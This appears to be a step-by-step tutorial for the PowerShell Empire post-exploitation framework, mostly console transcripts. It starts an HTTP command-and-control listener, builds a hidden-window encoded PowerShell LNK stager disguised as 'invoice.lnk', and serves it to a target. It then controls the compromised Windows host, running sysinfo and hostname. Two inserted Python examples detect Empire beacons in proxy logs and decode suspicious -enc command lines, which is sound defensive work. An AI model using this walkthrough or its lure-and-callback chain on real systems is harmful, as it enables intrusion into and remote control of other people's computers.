
How To Use Powershell Empire


Initial setup

Build a C2 server, which Empire calls a listener.

================================================================
 [Empire]  Post-Exploitation Framework
================================================================
 [Version] 2.5 | [Web] https://github.com/empireProject/Empire
================================================================

   _______ .___  ___. .______    __  .______       _______
  |   ____||   \/   | |   _  \  |  | |   _  \     |   ____|
  |  |__   |  \  /  | |  |_)  | |  | |  |_)  |    |  |__
  |   __|  |  |\/|  | |   ___/  |  | |      /     |   __|
  |  |____ |  |  |  | |  |      |  | |  |\  \----.|  |____
  |_______||__|  |__| | _|      |__| | _| `._____||_______|


       285 modules currently loaded

       0 listeners currently active

       0 agents currently active


(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > uselistener http
http          http_com      http_foreign  http_hop      http_mapi
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info

    Name: HTTP[S]
Category: client_server

Authors:
  @harmj0y

Description:
  Starts a http[s] listener (PowerShell or Python) that uses a
  GET/POST approach.

HTTP[S] Options:

  Name              Required    Value                            Description
  ----              --------    -------                          -----------
  SlackToken        False                                        Your SlackBot API token to communicate with your Slack instance.
  ProxyCreds        False       default                          Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
  KillDate          False                                        Date for the listener to exit (MM/dd/yyyy).
  Name              True        http                             Name for the listener.
  Launcher          True        powershell -noP -sta -w 1 -enc   Launcher string.
  DefaultDelay      True        5                                Agent delay/reach back interval (in seconds).
  DefaultLostLimit  True        60                               Number of missed checkins before exiting
  WorkingHours      False                                        Hours for the agent to operate (09:00-17:00).
  SlackChannel      False       #general                         The Slack channel or DM that notifications will be sent to.
  DefaultProfile    True        /admin/get.php,/news.php,/login/ Default communication profile for the agent.
                                process.php|Mozilla/5.0 (Windows
                                NT 6.1; WOW64; Trident/7.0;
                                rv:11.0) like Gecko
  Host              True        http://192.168.164.154:80        Hostname/IP for staging.
  CertPath          False                                        Certificate path for https listeners.
  DefaultJitter     True        0.0                              Jitter in agent reachback interval (0.0-1.0).
  Proxy             False       default                          Proxy to use for request (default, none, or other).
  UserAgent         False       default                          User-agent string to use for the staging request (default, none, or other).
  StagingKey        True        x,v|hOzsE1+7r.<5YwpjgT2R[6B0inmd Staging key for initial agent negotiation.
  BindIP            True        0.0.0.0                          The IP to bind to on the control server.
  Port              True        80                               Port for the listener.
  ServerVersion     True        Microsoft-IIS/7.5                Server header for the control server.
  StagerURI         False                                        URI for the stager. Must use /download/. Example: /download/stager.php


(Empire: listeners/http) > set BindIP 192.168.164.154
(Empire: listeners/http) > execute
[*] Starting listener 'http'
 * Serving Flask app "http" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off
[+] Listener successfully started!
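The listener above announces itself through its DefaultProfile URIs, its Trident/7.0 User-Agent and its Microsoft-IIS/7.5 Server header. The following added example (not part of the original page or the Empire project) scans constructed web-proxy log lines for hosts that repeatedly match those defaults; the log format is an assumption.

```python
"""Flag web-proxy records that match the Empire 2.5 default HTTP listener
profile: URIs /admin/get.php, /news.php, /login/process.php, the Trident/7.0
user-agent and the Microsoft-IIS/7.5 server header. The log format and the
sample lines are constructed for this example."""
import re
from collections import Counter

# Indicator values taken from the listener's DefaultProfile / ServerVersion.
EMPIRE_URIS = {"/admin/get.php", "/news.php", "/login/process.php"}
EMPIRE_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
EMPIRE_SERVER = "Microsoft-IIS/7.5"

# Assumed log format: client host method uri "user-agent" server-header
LINE_RE = re.compile(r'^(\S+) (\S+) (GET|POST) (\S+) "([^"]*)" (\S+)$')

def parse_line(line):
    """Return a dict for one proxy record, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    client, host, method, uri, ua, server = m.groups()
    return {"client": client, "host": host, "method": method,
            "uri": uri, "ua": ua, "server": server}

def score(rec):
    """Return the set of Empire default-profile indicators matched by a record."""
    hits = set()
    if rec["uri"] in EMPIRE_URIS:
        hits.add("default_uri")
    if rec["ua"] == EMPIRE_UA:
        hits.add("default_ua")
    if rec["server"] == EMPIRE_SERVER:
        hits.add("iis75_header")
    return hits

def find_beacons(lines, min_hits=2, min_requests=3):
    """Group by (client, host) and report pairs with repeated matching requests.
    A single URI hit is weak (news.php is common); require several indicators
    per request and several requests per pair before raising an alert."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and len(score(rec)) >= min_hits:
            counts[(rec["client"], rec["host"])] += 1
    return {pair: n for pair, n in counts.items() if n >= min_requests}

# Constructed sample log: three beacon-like requests plus one benign request.
SAMPLE_LOG = """\
10.0.0.5 192.168.164.154:80 GET /admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" Microsoft-IIS/7.5
10.0.0.5 192.168.164.154:80 GET /news.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" Microsoft-IIS/7.5
10.0.0.5 192.168.164.154:80 POST /login/process.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" Microsoft-IIS/7.5
10.0.0.7 example.com:443 GET /news.php "Mozilla/5.0 (X11; Linux x86_64) Firefox/66.0" nginx
""".splitlines()

if __name__ == "__main__":
    print(find_beacons(SAMPLE_LOG))
```

Operators change the profile easily, so treat these defaults as a cheap first-pass signal rather than a complete detection.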

Creating a callback program

Create a callback program, which Empire calls a stager.

(Empire) > usestager
multi/bash                osx/applescript           osx/launcher              osx/teensy                windows/ducky             windows/launcher_vbs      windows/teensy
multi/launcher            osx/application           osx/macho                 windows/backdoorLnkMacro  windows/hta               windows/launcher_xml
multi/macro               osx/ducky                 osx/macro                 windows/bunny             windows/launcher_bat      windows/macro
multi/pyinstaller         osx/dylib                 osx/pkg                   windows/csharp_exe        windows/launcher_lnk      windows/macroless_msword
multi/war                 osx/jar                   osx/safari_launcher       windows/dll               windows/launcher_sct      windows/shellcode
(Empire) > usestager windows/launcher_lnk
(Empire: stager/windows/launcher_lnk) > info

Name: LNKLauncher

Description:
  Create a .LNK file that launches the Empire
  stager.

Options:

  Name             Required    Value             Description
  ----             --------    -------           -----------
  Listener         True                          Listener to generate stager for.
  OutFile          True        clickme.lnk       File to output LNK to.
  LNKComment       False                         LNK Comment.
  Base64           True        True              Switch. Base64 encode the output.
  Proxy            False       default           Proxy to use for request (default, none,
                                                 or other).
  ProxyCreds       False       default           Proxy credentials
                                                 ([domain\]username:password) to use for
                                                 request (default, none, or other).
  UserAgent        False       default           User-agent string to use for the staging
                                                 request (default, none, or other).
  Icon             False       C:\program files\windows nt\accessories\wordpad.exePath to LNK icon.
  PowershellPath   True        C:\windows\system32\WindowsPowershell\v1.0\powershell.exePath to powershell.exe
  StagerRetries    False       0                 Times for the stager to retry
                                                 connecting.


(Empire: stager/windows/launcher_lnk) > set Listener http
(Empire: stager/windows/launcher_lnk) > set OutFile invoice.lnk
(Empire: stager/windows/launcher_lnk) > execute

[*] Stager output written out to: invoice.lnk
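The LNK stager runs the launcher string shown in the listener options, powershell -noP -sta -w 1 -enc followed by a base64 payload, with the PowershellPath from the stager options. The following added example (not part of the original page or the Empire project) examines a process-creation command line for that combination of switches and decodes the -enc payload for review; the command line is constructed with a harmless encoded command.

```python
"""Inspect a Windows process-creation command line (e.g. from Sysmon event 1
or Security event 4688) for the PowerShell launcher pattern used by the LNK
stager and decode the -enc payload. The sample command line is constructed."""
import base64

def decode_encoded_command(b64):
    """-enc / -EncodedCommand payloads are base64 of UTF-16LE text."""
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_cmdline(cmdline):
    """Return findings for a powershell command line, or None if not powershell.
    score counts the launcher switches seen plus one for a hidden window."""
    tokens = cmdline.split()
    exe = tokens[0].strip('"').lower() if tokens else ""
    if not exe.endswith(("powershell", "powershell.exe")):
        return None
    findings = {"flags": [], "hidden_window": False, "decoded": None}
    i = 1
    while i < len(tokens):
        t = tokens[i].lower()
        if t in ("-nop", "-noprofile"):
            findings["flags"].append("NoProfile")
        elif t == "-sta":
            findings["flags"].append("STA")
        elif t in ("-w", "-windowstyle") and i + 1 < len(tokens):
            i += 1
            findings["flags"].append("WindowStyle")
            # WindowStyle 1 is the numeric form of Hidden.
            findings["hidden_window"] = tokens[i].lower() in ("1", "hidden")
        elif t in ("-enc", "-encodedcommand", "-e") and i + 1 < len(tokens):
            i += 1
            findings["flags"].append("EncodedCommand")
            findings["decoded"] = decode_encoded_command(tokens[i])
        i += 1
    findings["score"] = len(findings["flags"]) + int(findings["hidden_window"])
    return findings

# Constructed sample: the stager's PowershellPath and launcher switches with a
# harmless encoded command in place of a real payload.
SAMPLE_B64 = base64.b64encode("Write-Host 'hello'".encode("utf-16-le")).decode()
SAMPLE_CMDLINE = ('"C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe" '
                  f'-noP -sta -w 1 -enc {SAMPLE_B64}')

if __name__ == "__main__":
    print(analyze_cmdline(SAMPLE_CMDLINE))
```

A score of 4 or more (NoProfile, STA, hidden window and an encoded command together) is rare in legitimate administration and is worth surfacing along with the decoded text and the parent process, which for this stager would be explorer.exe launching from a .lnk.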

Program distribution

Here, a simple web server is started on the C2 host; the target downloads the stager from it and executes it.

[email protected]:/opt/Empire# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
192.168.164.144 - - [21/Apr/2019 11:40:05] "GET / HTTP/1.1" 200 -
192.168.164.144 - - [21/Apr/2019 11:40:07] "GET /invoice.lnk HTTP/1.1" 200 -

Remote operation

If the callback succeeds and the agent connects to the C2 server, you can operate it remotely.

(Empire: stager/windows/launcher_lnk) > [*] Sending POWERSHELL stager (stage 1) to 192.168.164.144
[*] New agent K2FYZV6W checked in
[+] Initial agent K2FYZV6W from 192.168.164.144 now active (Slack)
[*] Sending agent (stage 2) to K2FYZV6W at 192.168.164.144

(Empire: stager/windows/launcher_lnk) > back
(Empire) > agents

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 K2FYZV6W ps 192.168.164.144 DESKTOP-1SS146L   DESKTOP-1SS146L\marseil powershell         592    5/0.0    2019-04-21 11:41:45

(Empire: agents) > rename K2FYZV6W target01
(Empire: agents) > list

[*] Active agents:

 Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen
 ----     -- -----------     ------------      --------                -------            ---    -----    ---------
 target01 ps 192.168.164.144 DESKTOP-1SS146L   DESKTOP-1SS146L\marseil powershell         592    5/0.0    2019-04-21 11:42:10

(Empire: agents) > interact target01
(Empire: target01) > sysinfo
[*] Tasked K2FYZV6W to run TASK_SYSINFO
[*] Agent K2FYZV6W tasked with task ID 1
(Empire: target01) > sysinfo: 0|http://192.168.164.154:80|DESKTOP-1SS146L|marseille|DESKTOP-1SS146L|192.168.164.144|Microsoft Windows 10 Pro|False|powershell|592|powershell|5
[*] Agent K2FYZV6W returned results.
Listener:         http://192.168.164.154:80
Internal IP:    192.168.164.144
Username:         DESKTOP-1SS146L\marseille
Hostname:       DESKTOP-1SS146L
OS: Microsoft Windows 10 Pro
High Integrity:   0
Process Name:     powershell
Process ID:       592
Language:         powershell
Language Version: 5

[*] Valid results returned by 192.168.164.144

(Empire: target01) > hostname
[*] Tasked K2FYZV6W to run TASK_SHELL
[*] Agent K2FYZV6W tasked with task ID 2
(Empire: target01) > [*] Agent K2FYZV6W returned results.
HostName        Aliases AddressList
--------        ------- -----------
DESKTOP-1SS146L {}      {192.168.164.144}
[*] Valid results returned by 192.168.164.144
